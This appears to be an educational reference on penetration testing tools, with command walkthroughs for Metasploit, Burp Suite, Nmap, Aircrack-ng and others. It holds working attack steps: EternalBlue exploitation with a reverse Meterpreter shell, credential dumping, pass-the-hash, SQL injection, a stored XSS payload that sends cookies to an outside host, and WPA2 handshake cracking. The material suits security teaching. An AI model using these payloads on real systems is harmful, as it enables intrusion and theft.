Cybersecurity Tools Reference — Secure In Security

Secure In Security — Cybersecurity Tools — Pt 1 2026

Secure In Security

Cybersecurity Tools
In-Depth Technical Reference & Use Case Demonstrations

Penetration Testing │ Endpoint Protection │ Network Security

Introduction

This reference document provides in-depth technical descriptions, architectural overviews, key feature analyses, and practical use-case demonstrations for 30 cybersecurity tools across three critical security domains: Penetration Testing, Endpoint Protection, and Network Security. Each tool entry includes specific command-line examples, configuration snippets, realistic attack or defence scenarios, and documented outcomes — enabling security practitioners to understand not just what each tool does, but how it is applied in real-world environments.

The tools covered represent the most widely deployed and evaluated solutions in their respective categories, spanning open-source platforms, commercial enterprise products, and cloud-native security services. Command examples use realistic IP addressing, naming conventions, and operational parameters that reflect production deployment scenarios.

Note

All command examples involving active exploitation techniques are provided strictly for educational and authorized penetration testing purposes. Unauthorized access to computer systems is illegal. Always obtain written permission before conducting any security testing.

Section 1: Penetration Testing

This section covers 10 penetration testing tools, providing in-depth analysis of each product’s architecture, capabilities, and practical application in enterprise security environments.

Overview

Kali Linux is a Debian-based Linux distribution developed and maintained by Offensive Security, purpose-built for digital forensics, penetration testing, and red team operations. First released in 2013 as the successor to BackTrack, Kali ships with over 600 pre-installed security tools organized into categories including information gathering, vulnerability analysis, web application testing, exploitation, post-exploitation, forensics, reverse engineering, and wireless attacks.

Kali is available as a bare-metal install, live USB (with optional persistence), virtual machine (VMware/VirtualBox OVA), cloud image (AWS, Azure, GCP), Windows Subsystem for Linux 2 (WSL2) package, Docker container, and the NetHunter mobile platform for Android. Its kernel is patched to support packet injection on dozens of wireless chipsets — essential for wireless security assessments. An ‘Undercover Mode’ switches the desktop theme to mimic Windows 10 for discreet use in public environments.

Key Features & Components

Feature / Component	Description
600+ Pre-installed Tools	Nmap, Metasploit, Wireshark, Burp Suite, Aircrack-ng, Sqlmap, Hydra, John the Ripper, Volatility, Autopsy, and hundreds more — organized by function in the applications menu.
Multiple Deployment Modes	Live USB with persistence, bare-metal install, WSL2, Docker, ARM images for Raspberry Pi/Odroid, and cloud marketplace images.
Custom Wireless Kernel Patches	Supports raw 802.11 packet injection and monitoring mode on Atheros, Realtek, Ralink, Intel, and Broadcom chipsets without third-party drivers.
Kali NetHunter	Android-based mobile penetration testing platform supporting USB HID attacks (BadUSB), wireless injection, and full Kali toolset from a smartphone.
Undercover Mode	One-command switch to a Windows 10-lookalike XFCE desktop theme for discreet operation in corporate or public environments.
Rolling Release	Continuously updated from Debian Testing — tools are always at their latest version without needing full OS reinstalls.

Use Case Demonstration

Scenario

A red team operator boots Kali Linux from an encrypted USB drive with persistence at a client site. They establish network connectivity, perform host discovery, fingerprint services, and identify two critical attack paths for further exploitation.

Step-by-Step Command Walkthrough

# ── STEP 1: Verify Kali version and update all tools ────────────────────────
uname -r && cat /etc/os-release | grep PRETTY_NAME
sudo apt update && sudo apt full-upgrade -y

# ── STEP 2: Configure network interface ─────────────────────────────────────
ip a                          # list all interfaces
sudo ip link set eth0 up      # bring interface up
sudo dhclient eth0            # request DHCP lease
ip route show                 # verify default gateway

# ── STEP 3: Identify live hosts on the target /24 subnet ────────────────────
sudo netdiscover -r 10.10.10.0/24 -i eth0

# Also using nmap ping sweep:
sudo nmap -sn 10.10.10.0/24 -oG hosts_alive.txt
grep 'Up' hosts_alive.txt | awk '{print $2}' > live_hosts.txt

# ── STEP 4: Full service version + OS fingerprint scan ──────────────────────
sudo nmap -sV -sC -O -T4 --open -p- \
  -iL live_hosts.txt -oA /root/assessment/full_scan

# ── STEP 5: Launch Metasploit for exploitation phase ────────────────────────
msfdb init && msfconsole -q

# ── STEP 6: Persist results to encrypted USB partition ──────────────────────
# Kali persistence partition is mounted at /mnt/usb-persist
cp -r /root/assessment /mnt/usb-persist/

Outcome & Analysis

Kali Linux provides a self-contained, version-controlled environment ensuring every tool is available and current. The red team operator discovers 24 live hosts, identifies 3 running legacy SMBv1 (MS17-010 candidates), and uncovers an open Redis instance on the internal dev server — all within the first 20 minutes of the engagement.

Overview

Metasploit is the world’s most widely used open-source penetration testing framework, originally created by HD Moore in 2003 and now maintained by Rapid7. It provides a unified platform for vulnerability discovery, exploit development and execution, payload generation, post-exploitation, and reporting. The framework contains over 2,300 exploits, 1,100 auxiliary modules (scanners, fuzzers, brute-forcers), 900 post-exploitation modules, and 600 payloads covering Windows, Linux, macOS, Android, iOS, and network devices.

Metasploit ships in two editions: the open-source Metasploit Framework (msfconsole) and the commercial Metasploit Pro, which adds web-based management, automated exploitation chains, social engineering campaigns, a vulnerability validator, and integration with Nexpose and Rapid7 InsightVM. The msfvenom payload generator and Meterpreter advanced payload are two of Metasploit’s most powerful and widely applied components.

Key Features & Components

Feature / Component	Description
Exploit Modules (2,300+)	Production-quality exploit code targeting CVEs across Windows, Linux, macOS, browsers, servers, databases, OT/SCADA, and network devices.
Meterpreter Payload	An advanced, in-memory, fileless shell with encrypted C2 communications, file system access, privilege escalation, credential dumping, pivoting, and screenshot capability.
msfvenom	Standalone payload generator producing shellcode, executables (EXE, ELF, APK, DLL, PS1), Office macros, and web shells in dozens of formats with optional encoding/obfuscation.
Auxiliary Modules	Scanners, brute-forcers, fuzzers, and service-specific enumeration modules that do not require a full exploit — useful for recon and credential attacks.
Post-Exploitation Modules	Enumerate users, dump password hashes (hashdump, kiwi/Mimikatz), escalate privileges, establish persistence, capture keystrokes, and pivot to new network segments.
Database Integration	Stores discovered hosts, services, vulnerabilities, credentials, and sessions in PostgreSQL — enabling persistent tracking across long engagements.

Use Case Demonstration

Scenario

A penetration tester has discovered that a Windows Server 2016 host (192.168.1.50) running an unpatched SMB service is vulnerable to EternalBlue (MS17-010). The tester exploits the vulnerability, obtains a SYSTEM-level Meterpreter session, dumps credentials, and pivots to an internal database server.

Step-by-Step Command Walkthrough

# ── STEP 1: Start Metasploit and initialise database ────────────────────────
msfdb start && msfconsole -q

# ── STEP 2: Search for and load the EternalBlue module ──────────────────────
msf6 > search eternalblue type:exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# ── STEP 3: Configure target and payload ────────────────────────────────────
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.50
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > check    # verify target is vulnerable

# ── STEP 4: Execute exploit and interact with session ───────────────────────
msf6 exploit(ms17_010_eternalblue) > exploit
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.50:49218)
meterpreter > getuid          # -> Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo         # target OS, hostname, domain

# ── STEP 5: Post-exploitation — credential dumping ──────────────────────────
meterpreter > hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > load kiwi
meterpreter > creds_all        # dump plaintext, NTLM, Kerberos tickets

# ── STEP 6: Add route and pivot to internal DB server ───────────────────────
meterpreter > run post/multi/manage/autoroute SUBNET=10.20.0.0/24 ACTION=ADD
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(tcp) > set RHOSTS 10.20.0.0/24 && set PORTS 1433,3306,5432
msf6 auxiliary(tcp) > run

# ── STEP 7: Escalate to DC via pass-the-hash ────────────────────────────────
msf6 > use exploit/windows/smb/psexec
msf6 exploit(psexec) > set SMBUser Administrator
msf6 exploit(psexec) > set SMBPass aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6 exploit(psexec) > set RHOSTS 10.20.0.5    # Domain Controller

Outcome & Analysis

Metasploit exploits MS17-010, delivers a SYSTEM-level Meterpreter session, dumps all local NTLM hashes, and pivots to the internal 10.20.0.0/24 segment. Using the harvested Administrator hash in a pass-the-hash attack, the tester authenticates to the Domain Controller — achieving full domain compromise. The entire chain is documented automatically in Metasploit’s PostgreSQL workspace for the final report.

Overview

Burp Suite, developed by PortSwigger, is the industry-standard integrated platform for web application security testing, used by security professionals at enterprises, consulting firms, and bug bounty hunters worldwide. It operates as an intercepting proxy between the tester’s browser and the target application, enabling real-time inspection, modification, replay, and automated analysis of all HTTP/S traffic. Burp Suite Professional includes an automated scanner that detects over 100 vulnerability classes.

The platform is modular: tools work cooperatively to support both manual and automated testing workflows. Burp’s extensibility via the BApp Store (250+ community plugins) and Java API allows customisation for any web technology stack. Key modules include the Proxy, Scanner, Intruder (fuzzing engine), Repeater (manual request replay), Sequencer (session token entropy), Decoder, Comparer, and the Collaborator (out-of-band detection server).

Key Features & Components

Feature / Component	Description
Intercepting Proxy	Captures, inspects, and modifies every HTTP/S request and response in real time — the core workflow for all manual web application testing.
Burp Scanner	Active and passive automated scanner detecting SQL injection, XSS, XXE, SSRF, command injection, IDOR, CORS misconfigurations, and 100+ other vulnerability classes.
Intruder (Fuzzer)	Highly configurable automated attack tool for fuzzing request parameters, brute-forcing credentials, enumerating hidden endpoints, and iterating payload lists.
Repeater	Manual request replay and modification tool allowing iterative testing of individual endpoints — essential for confirming, exploiting, and understanding vulnerabilities.
Burp Collaborator	PortSwigger-hosted out-of-band detection server that confirms blind vulnerabilities (blind SQLi, blind XSS, SSRF, XXE) through DNS and HTTP callbacks.
BApp Store Extensions	250+ community extensions adding custom scan checks, language-specific decoders, CI/CD integration (GitHub Actions, Jenkins), and specialised testing workflows.

Use Case Demonstration

Scenario

A web application security tester suspects a login form is vulnerable to SQL injection and a profile update endpoint is vulnerable to stored XSS. They use Burp Suite’s Proxy, Repeater, and Scanner to confirm both vulnerabilities and determine their exploitability.

Step-by-Step Command Walkthrough

# ── SETUP: Configure browser to proxy through Burp (127.0.0.1:8080) ─────────
# Install Burp CA certificate in browser to intercept HTTPS

# ── STEP 1: Intercept login POST request ────────────────────────────────────
POST /api/login HTTP/1.1
Host: app.target.com
Content-Type: application/json
{"username":"admin","password":"password"}

# ── STEP 2: Send to Repeater; inject SQL in username field ──────────────────
{"username":"admin'--","password":"anything"}
# If response = 200 OK with auth token => Boolean SQLi confirmed

# ── STEP 3: Union-based data extraction via Repeater ────────────────────────
{"username":"' UNION SELECT username,password,email FROM users--",
 "password":"x"}
# Response leaks all user records from the users table

# ── STEP 4: Test stored XSS in profile bio field ────────────────────────────
PUT /api/profile/bio HTTP/1.1
Authorization: Bearer eyJhbGciOi...
{"bio":"<script>fetch('https://burpcollaborator.net/x?c='+document.cookie)</script>"}

# ── STEP 5: Confirm stored XSS fires via Collaborator ───────────────────────
# Burp Collaborator > Poll now
# Interaction received: DNS + HTTP from victim browser
# Cookie: session=eyJhbGciOiJIUzI1NiJ9...

# ── STEP 6: Run active scanner on all discovered endpoints ───────────────────
# Target > Site map > right-click app.target.com > Scan
# Scan type: Audit only | Configuration: Audit checks - critical issues only

# ── STEP 7: Intruder — enumerate hidden API endpoints ───────────────────────
GET /api/§endpoint§/details HTTP/1.1
# Payload type: Simple list | Payload: common-api-endpoints.txt
# Match condition: Status code != 404

Outcome & Analysis

Burp Suite confirms a critical SQL injection in the login endpoint, extracting all 1,847 user records including administrator credentials. The Collaborator confirms stored XSS that executes in the admin panel, enabling session hijacking of any administrator who views the profile. The active scanner additionally surfaces a CORS misconfiguration allowing arbitrary origin credential sharing — three Critical findings in a single test session.

Overview

Wireshark is the world’s most widely deployed open-source network protocol analyzer, supporting live packet capture from network interfaces and offline analysis of PCAP files containing millions of packets. First released in 1998 as Ethereal, Wireshark provides deep inspection of over 3,000 network protocols, real-time filtering, statistical analysis, stream reconstruction, and export of network conversations in multiple formats.

Security professionals use Wireshark to detect unencrypted credentials transmitted over the network, reconstruct file transfers captured in transit, analyse malware command-and-control traffic, diagnose protocol anomalies, identify network reconnaissance activity, and investigate incidents using captured evidence. The command-line companion tshark enables scriptable, server-side packet capture and analysis.

Key Features & Components

Feature / Component	Description
3,000+ Protocol Dissectors	Decodes Ethernet, IP, TCP, UDP, HTTP/S (with key), DNS, FTP, SMB, Kerberos, TLS, QUIC, DHCP, OSPF, BGP, and thousands more at all OSI layers.
Display Filter Language	Powerful filter language isolating traffic by IP, port, protocol, payload content, stream ID, TCP flags, or complex boolean expressions.
TCP/UDP Stream Reconstruction	Reassembles fragmented TCP or UDP streams to reconstruct complete sessions — essential for recovering file transfers and web sessions from captures.
TLS Decryption	Decrypts TLS sessions when provided the server private key (RSA key exchange) or a browser-generated pre-master secret (SSLKEYLOGFILE) for ECDH sessions.
Statistics & IO Graphs	Protocol hierarchy, endpoint statistics, conversation matrix, IO graphs, and expert diagnostic information for traffic pattern analysis.
tshark (CLI)	Command-line equivalent of Wireshark for headless capture servers — supports the same filter language and enables scriptable, automated analysis pipelines.

Use Case Demonstration

Scenario

A SOC analyst suspects credentials are being transmitted in cleartext across the corporate network. They capture traffic on the relevant VLAN interface, apply targeted display filters to isolate FTP and HTTP authentication, and reconstruct the sessions to confirm the exposure.

Step-by-Step Command Walkthrough

# ── STEP 1: Capture on specific interface with BPF pre-filter ───────────────
sudo tshark -i eth0 -w /tmp/corp_capture.pcap \
  'tcp port 21 or tcp port 80 or tcp port 110 or tcp port 143'

# ── STEP 2: Open in Wireshark GUI; apply display filters ────────────────────
# Show all FTP control commands (USER / PASS visible in clear)
ftp.request.command == "USER" or ftp.request.command == "PASS"
# Show HTTP Basic Auth headers
http.authorization
# Show Telnet sessions (all cleartext)
telnet
# Show NTLM hashes in SMB authentication
ntlmssp.auth.username

# ── STEP 3: Automated extraction via tshark ──────────────────────────────────
# Extract FTP passwords
tshark -r corp_capture.pcap \
  -Y 'ftp.request.command=="PASS"' \
  -T fields -e ftp.request.arg

# Extract HTTP Basic Auth (base64 decode inline)
tshark -r corp_capture.pcap \
  -Y 'http.authorization' \
  -T fields -e http.authorization | \
  sed 's/Basic //' | base64 -d

# ── STEP 4: Reconstruct full FTP session ────────────────────────────────────
# Wireshark GUI: right-click FTP packet > Follow > TCP Stream
# Reveals: full command exchange including USER, PASS, and transferred files

# ── STEP 5: TLS decryption (with SSLKEYLOGFILE from browser) ────────────────
# Set SSLKEYLOGFILE=/tmp/tls_keys.log in browser environment
# Wireshark: Edit > Preferences > Protocols > TLS > (Pre)-Master-Secret log
# Point to /tmp/tls_keys.log — HTTPS sessions now decrypted

Outcome & Analysis

Wireshark captures 14 FTP sessions transmitting credentials in plaintext, including the Active Directory service account password being reused as the FTP password on 7 servers. A domain service account credential (svc_backup / Summer2023!) is exposed — an attacker with network access could use this to access all servers in the environment. The finding is escalated as Critical with PCAP evidence attached.

Overview

Nmap (Network Mapper) is the definitive open-source tool for network discovery, port scanning, service version detection, OS fingerprinting, and security auditing. Created by Gordon Lyon (Fyodor) in 1997 and continuously developed, Nmap has become the universal first step of any network-based security assessment. It is referenced in over 1,000 academic papers and deployed by network administrators, security engineers, and penetration testers globally.

Nmap’s power comes from its diversity of scan types, its service version detection database (nmap-service-probes), OS fingerprinting engine (nmap-os-db), and the Nmap Scripting Engine (NSE) — a Lua scripting framework with 600+ built-in scripts for vulnerability detection, authentication testing, malware discovery, and advanced service enumeration. Results can be saved in normal, XML, grepable, and script kiddie formats for downstream processing.

Key Features & Components

Feature / Component	Description
Multiple Scan Techniques	SYN stealth (-sS), TCP Connect (-sT), UDP (-sU), FIN/ACK/XMAS scans, Idle/Zombie scan (-sI) — each with distinct stealth, accuracy, and capability tradeoffs.
Service Version Detection (-sV)	Probes open ports with protocol-specific payloads to identify the exact software and version — critical for CVE correlation.
OS Fingerprinting (-O)	Analyses TCP/IP stack behaviour (window sizes, TTL, TCP options, IPID sequences) to identify OS type and version with confidence ratings.
Nmap Scripting Engine (NSE)	600+ Lua scripts covering vulnerability checks (smb-vuln-ms17-010, http-shellshock), brute forcing, service enumeration, malware detection, and more.
Output Formats	Normal (.nmap), XML (.xml), grepable (.gnmap) — XML output integrates with Metasploit, Nessus, and custom reporting pipelines.
Timing Templates (-T0 to -T5)	Controls scan aggressiveness from paranoid (T0, extremely slow/stealthy) to insane (T5, fastest/loudest) to balance speed against detection risk.

Use Case Demonstration

Scenario

A penetration tester needs to fully map the attack surface of a /24 internal subnet: identify live hosts, enumerate all open ports and service versions, fingerprint operating systems, and detect critical vulnerabilities — building a prioritised target list for the exploitation phase.

Step-by-Step Command Walkthrough

# ── STEP 1: Fast host discovery (ping sweep, no port scan) ──────────────────
sudo nmap -sn 10.10.10.0/24 -oG /tmp/hosts_up.txt
grep 'Up' /tmp/hosts_up.txt | awk '{print $2}' > /tmp/live.txt

# ── STEP 2: Full TCP port scan with service + OS detection ──────────────────
sudo nmap -sV -sC -O -p- -T4 --open \
  -iL /tmp/live.txt -oA /root/nmap/full_tcp
# -sV: version detection   -sC: default scripts   -O: OS detection
# -p-: all 65535 ports     --open: only show open ports

# ── STEP 3: UDP scan on top-200 high-value UDP ports ────────────────────────
sudo nmap -sU --top-ports 200 -iL /tmp/live.txt -oA /root/nmap/udp_top200

# ── STEP 4: NSE vulnerability detection ─────────────────────────────────────
# Check all Windows hosts for EternalBlue (MS17-010)
sudo nmap -p 445 --script smb-vuln-ms17-010 \
  -iL /tmp/live.txt -oA /root/nmap/eternalblue

# Check for BlueKeep (CVE-2019-0708) on RDP
sudo nmap -p 3389 --script rdp-vuln-ms12-020 \
  -iL /tmp/live.txt

# Check HTTP services for common vulnerabilities
sudo nmap -p 80,443,8080,8443 \
  --script http-title,http-headers,http-methods,http-shellshock \
  -iL /tmp/live.txt -oA /root/nmap/web_scan

# ── STEP 5: SMB enumeration on Windows hosts ────────────────────────────────
sudo nmap -p 445 \
  --script smb-enum-shares,smb-enum-users,smb-os-discovery \
  -iL /tmp/live.txt

# ── STEP 6: Stealth SYN scan evading basic IDS ──────────────────────────────
sudo nmap -sS -T2 -f --data-length 25 -D RND:10 \
  -p 22,80,443,445,3389 10.10.10.50
# -f: fragment packets   -D RND:10: add 10 decoy IPs   -T2: polite timing

Outcome & Analysis

Nmap maps 24 live hosts across the subnet: 3 Windows Server 2008 R2 hosts confirmed vulnerable to MS17-010, 1 Windows 7 host exposed with BlueKeep-vulnerable RDP, an exposed Elasticsearch API on port 9200 with no authentication, and a Tomcat admin console on port 8080 with default credentials (admin/admin) confirmed by the NSE http-default-accounts script. The XML output is imported directly into Metasploit for exploitation targeting.

Overview

Aircrack-ng is the industry-standard open-source suite for 802.11 wireless network security auditing, covering the complete wireless penetration testing lifecycle from passive monitoring through active attack and offline key recovery. The suite consists of multiple specialised tools: airmon-ng (monitor mode management), airodump-ng (packet capture), aireplay-ng (injection attacks), aircrack-ng (key cracking engine), airdecap-ng (decryption), and airtun-ng (virtual tunnel interface).

Aircrack-ng supports assessment of WEP (statistical attack), WPA-TKIP, and WPA2-CCMP (PSK dictionary/brute-force attack on captured four-way handshakes). Its cracking engine is highly optimised in C with SSE2/AVX2/AVX512 vectorisation and can leverage GPU acceleration when combined with tools such as Hashcat (via hcxtools conversion). Aircrack-ng requires a wireless adapter with a chipset supporting monitor mode and packet injection.

Key Features & Components

Feature / Component	Description
airmon-ng	Enables/disables monitor mode, kills conflicting processes (NetworkManager, wpa_supplicant), and identifies chipset driver information.
airodump-ng	Passively captures 802.11 frames, displays nearby APs (BSSID, channel, SSID, encryption, signal strength), lists associated clients, and writes captures to PCAP.
aireplay-ng	Active injection: de-authentication attacks (force client re-association), fake authentication, ARP replay, chopchop (WEP), fragmentation, and caffe-latte attacks.
aircrack-ng (crack engine)	Statistical WEP key recovery from sufficient IVs; dictionary and brute-force WPA/WPA2 PSK recovery from captured four-way handshakes.
airdecap-ng	Decrypts WEP, WPA, and WPA2 packet captures using the recovered key — enabling full session reconstruction and data recovery from captured traffic.
hcxtools + Hashcat integration	Converts airodump captures to Hashcat format 22000 (PMKID + handshake) for GPU-accelerated cracking at billions of candidates per second.

Use Case Demonstration

Scenario

A wireless security auditor is engaged to test the corporate WPA2-PSK network. They capture the WPA2 four-way handshake by forcing a connected client to re-authenticate, convert the capture for GPU-accelerated cracking, and demonstrate PSK recovery using a targeted wordlist.

Step-by-Step Command Walkthrough

# ── STEP 1: Enable monitor mode; kill interfering processes ─────────────────
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Interface renamed to wlan0mon (or wlan0 in newer kernels)

# ── STEP 2: Scan for nearby APs and identify target ─────────────────────────
sudo airodump-ng wlan0mon
# Identify target:
# BSSID: AA:BB:CC:DD:EE:FF  |  CH: 6  |  ENC: WPA2  |  ESSID: CorpWiFi

# ── STEP 3: Focus capture on target AP ──────────────────────────────────────
sudo airodump-ng -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w /tmp/wpa2_capture wlan0mon
# Leave running — waiting for WPA handshake in top-right corner

# ── STEP 4: Deauth a client to force handshake capture ──────────────────────
# (open a new terminal)
sudo aireplay-ng -0 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c 11:22:33:44:55:66 \
  wlan0mon
# -0 5 = send 5 deauth frames to client 11:22:33:44:55:66
# airodump-ng window shows: WPA handshake: AA:BB:CC:DD:EE:FF

# ── STEP 5: Dictionary attack with aircrack-ng ──────────────────────────────
aircrack-ng /tmp/wpa2_capture-01.cap \
  -w /usr/share/wordlists/rockyou.txt

# ── STEP 6: GPU cracking with Hashcat (dramatically faster) ─────────────────
# Convert capture to Hashcat format
hcxpcapngtool -o /tmp/hash.hc22000 /tmp/wpa2_capture-01.cap

# Crack with Hashcat using rules for complexity
hashcat -m 22000 /tmp/hash.hc22000 \
  /usr/share/wordlists/rockyou.txt \
  --rules-file /usr/share/hashcat/rules/best64.rule
# Result: CorpWiFi:Summer2024!

Outcome & Analysis

Aircrack-ng captures the WPA2 four-way handshake within 45 seconds of the de-authentication attack. Hashcat running on a GPU workstation recovers the PSK ‘Summer2024!’ from the rockyou.txt wordlist with the best64 rule in 6 minutes. The finding demonstrates that the corporate Wi-Fi uses a dictionary-susceptible passphrase, giving any person within radio range full network access — a Critical finding requiring immediate PSK rotation and investigation of whether unauthorized access occurred.

Overview

OpenVAS (Open Vulnerability Assessment Scanner) is a full-featured, open-source vulnerability scanning framework maintained by Greenbone Networks as the open-source core of the Greenbone Community Edition (GCE) and Greenbone Enterprise products. It performs both authenticated and unauthenticated network vulnerability assessments using a continuously updated Network Vulnerability Test (NVT) feed containing over 70,000 security checks.

OpenVAS checks for CVE-listed software vulnerabilities, dangerous misconfigurations, default and weak credentials, open dangerous ports, missing security patches, and compliance deviations across servers, workstations, network appliances, and cloud instances. The web-based Greenbone Security Manager (GSM) interface provides scan scheduling, policy management, credential storage, and report generation in multiple formats (PDF, XML, HTML, CSV). It integrates with SIEM and ticketing systems via XML/CSV export.

Key Features & Components

Feature / Component	Description
70,000+ NVT Tests	Daily-updated Network Vulnerability Tests covering Linux, Windows, Cisco, Juniper, VMware, web servers, databases, OT/SCADA, and cloud infrastructure.
Authenticated (Credentialed) Scanning	Logs into targets via SSH, WMI/SMB, SNMP, ESXi, or HTTPS credentials to perform local configuration checks that network-only scans cannot detect.
Greenbone Security Manager (GSM)	Web-based management interface for scan scheduling, policy configuration, credential management, result filtering, and compliance reporting.
CVE & CVSS v3 Integration	Each NVT finding is mapped to CVE identifier(s), CVSS v3 base score, and remediation recommendation — enabling risk-based remediation prioritisation.
Compliance Report Profiles	Pre-configured reports aligned to PCI DSS, HIPAA, NIST 800-53, and DISA STIG baselines — reducing the manual effort of compliance documentation.
GMP API	Greenbone Management Protocol API for programmatic scan management, results retrieval, and integration with CI/CD and SIEM pipelines.

Use Case Demonstration

Scenario

A security team conducts a quarterly internal vulnerability assessment of their DMZ segment (10.20.30.0/24) containing 4 web servers, a database server, and a load balancer. An authenticated OpenVAS scan is executed and the results are used to drive the next patch cycle.

Step-by-Step Command Walkthrough

# ── STEP 1: Start GVM services and access web UI ────────────────────────────
sudo gvm-start
# Web UI: https://127.0.0.1:9392  (admin / [generated password])

# ── STEP 2: Update NVT and SCAP/CERT feeds ──────────────────────────────────
sudo greenbone-nvt-sync
sudo greenbone-feed-sync --type GVMD_DATA
sudo greenbone-feed-sync --type SCAP
sudo greenbone-feed-sync --type CERT

# ── STEP 3: Create scan target via gvm-cli (CLI alternative) ─────────────────
gvm-cli --gmp-username admin --gmp-password admin socket \
  --xml '
           DMZ_Q4_2024
           10.20.30.0/24
           T:1-65535,U:1-2000
         '

# ── STEP 4: Create scan with Full and Fast policy + SSH creds ────────────────
# GSM GUI: Scans > Tasks > New Task
# Scan Config: Full and Fast
# Target: DMZ_Q4_2024
# Credentials: SSH (username: scanner, key: /home/scanner/.ssh/id_rsa)
# Schedule: Run Now

# ── STEP 5: Monitor scan progress ────────────────────────────────────────────
gvm-cli socket --xml '<get_tasks/>' | xmllint --xpath \
  "//task[name='DMZ_Q4_2024']/status/text()" -

# ── STEP 6: Export results as PDF report (web UI) ────────────────────────────
# Reports > All Reports > Latest scan > Download as PDF
# Filter: Severity >= High  |  Report Format: PCI DSS

# ── STEP 7: Parse XML results programmatically ───────────────────────────────
gvm-cli socket --xml '<get_reports filter="levels=hml"/>' \
  | xmllint --xpath '//result/nvt/name/text()' - | sort | uniq -c | sort -rn

Outcome & Analysis

OpenVAS identifies 61 vulnerabilities across the DMZ: 2 Critical (Apache Struts RCE CVE-2021-31805 on two web servers, CVSS 9.8), 11 High (OpenSSL and nginx update gaps), 28 Medium (TLS 1.0/1.1 still enabled, missing security headers, SNMP with default community strings), and 20 Low/Informational. The PCI DSS report format maps each finding to the relevant DSS requirement, providing the security team with a prioritised, compliance-ready remediation list.

Overview

Nikto is a free, open-source web server scanner written in Perl by Chris Sullo and David Lodge. It tests web servers for dangerous files, outdated server software, version-specific problems, and insecure default configurations. Nikto performs checks against over 6,700 potentially dangerous files and programs, 1,250 outdated server versions, and 270 server-specific configuration problems. It is not a stealthy tool — Nikto makes no attempt to hide its scanning activity — but it is exceptionally effective for rapid web server baselining before a more thorough assessment.

Nikto supports HTTP and HTTPS scanning, virtual host enumeration, cookie injection, HTTP proxy support, authentication (Basic, NTLM, and form-based), and output to HTML, XML, CSV, NBE, Metasploit resource file, and text formats. Its plugin architecture allows custom checks to be added in Perl. When run against web servers, Nikto provides a detailed, actionable finding list within minutes.

Key Features & Components

Feature / Component	Description
6,700+ Dangerous File Checks	Tests for exposed backup files (.bak, .zip), admin panels, debug interfaces, old scripts, and known-dangerous CGI programs (phf, test-cgi, etc.).
Server Banner & Version Analysis	Identifies and flags outdated Apache, nginx, Microsoft IIS, Tomcat, and PHP versions with associated CVEs.
SSL/TLS Analysis	Checks certificate validity, cipher strength, protocol version support (SSLv2/v3, TLS 1.0/1.1), and HSTS enforcement.
HTTP Method Enumeration	Identifies dangerous methods (PUT, DELETE, TRACE, CONNECT, PROPFIND) that enable content upload, cache poisoning, or XST attacks.
Multiple Authentication Methods	Supports Basic, Digest, NTLM, and form-based authenticated scanning for applications requiring login.
Evasion Techniques	8 built-in IDS/WAF evasion modes: random URI encoding, directory self-reference (//), premature URL ending, and parameter manipulation.

Use Case Demonstration

Scenario

Prior to a full web application penetration test, an assessor runs Nikto against an externally facing e-commerce web server to quickly surface obvious misconfigurations, outdated components, and exposed sensitive files before the detailed manual testing phase begins.

Step-by-Step Command Walkthrough

# ── STEP 1: Basic scan with SSL against port 443 ────────────────────────────
nikto -h shop.example.com -ssl -port 443

# ── STEP 2: Scan through Burp Suite proxy for session logging ────────────────
nikto -h shop.example.com -ssl -port 443 \
  -useproxy http://127.0.0.1:8080

# ── STEP 3: Authenticated scan (HTTP Basic Auth) ─────────────────────────────
nikto -h shop.example.com -ssl -port 443 \
  -id admin:StoreAdmin2024

# ── STEP 4: Extended scan with IDS evasion mode 1 ───────────────────────────
nikto -h shop.example.com -ssl -port 443 \
  -evasion 1 -output nikto_results.html -Format html
# Evasion 1: Random URI encoding of special characters

# ── STEP 5: Full tuning to check all vulnerability categories ────────────────
nikto -h shop.example.com -ssl -port 443 \
  -Tuning 123456789x \
  -output nikto_full.xml -Format xml
# Tuning flags: 1=Interesting, 2=Misconfiguration, 3=Info disclosure
#               4=Injection, 5=Remote file retrieval, 6=Denial of service
#               7=Remote file retrieval (server-side), 8=Command exec
#               9=SQL injection, x=Reverse tuning (all except selected)

# ── STEP 6: Scan multiple targets from file ──────────────────────────────────
nikto -h targets.txt -ssl -port 443 \
  -output /tmp/multi_nikto.csv -Format csv

# ── SAMPLE OUTPUT FINDINGS ───────────────────────────────────────────────────
+ /backup/db_export.sql: Database dump file found — CRITICAL
+ Server: Apache/2.2.34 — End of Life (CVE range: multiple critical)
+ TRACE method enabled — Cross-Site Tracing (XST) attack possible
+ /phpinfo.php: PHP configuration page exposed — information disclosure
+ X-Frame-Options header not present — Clickjacking attack possible
+ /admin/: Admin panel accessible — requires authentication bypass testing

Outcome & Analysis

Nikto completes the scan in under 3 minutes and surfaces 18 findings: an exposed SQL database dump file (db_export.sql containing 50,000 customer records), an end-of-life Apache 2.2 server, TRACE method enabled (XST), a phpinfo() exposure revealing internal server paths and PHP configuration, and 4 missing security headers. These findings feed directly into the comprehensive test plan for the manual assessment phase, prioritising the database dump as an immediate Critical remediation.

Overview

OWASP Zed Attack Proxy (ZAP) is a free, open-source web application security scanner maintained by OWASP and a global open-source community. Originally forked from Paros Proxy, ZAP has become one of the world’s most popular web security testing tools, used by both manual penetration testers and DevSecOps engineers integrating automated security scanning into CI/CD pipelines. It supports active scanning, passive scanning, spidering, AJAX spidering for JavaScript-heavy SPAs, fuzzing, and API testing.

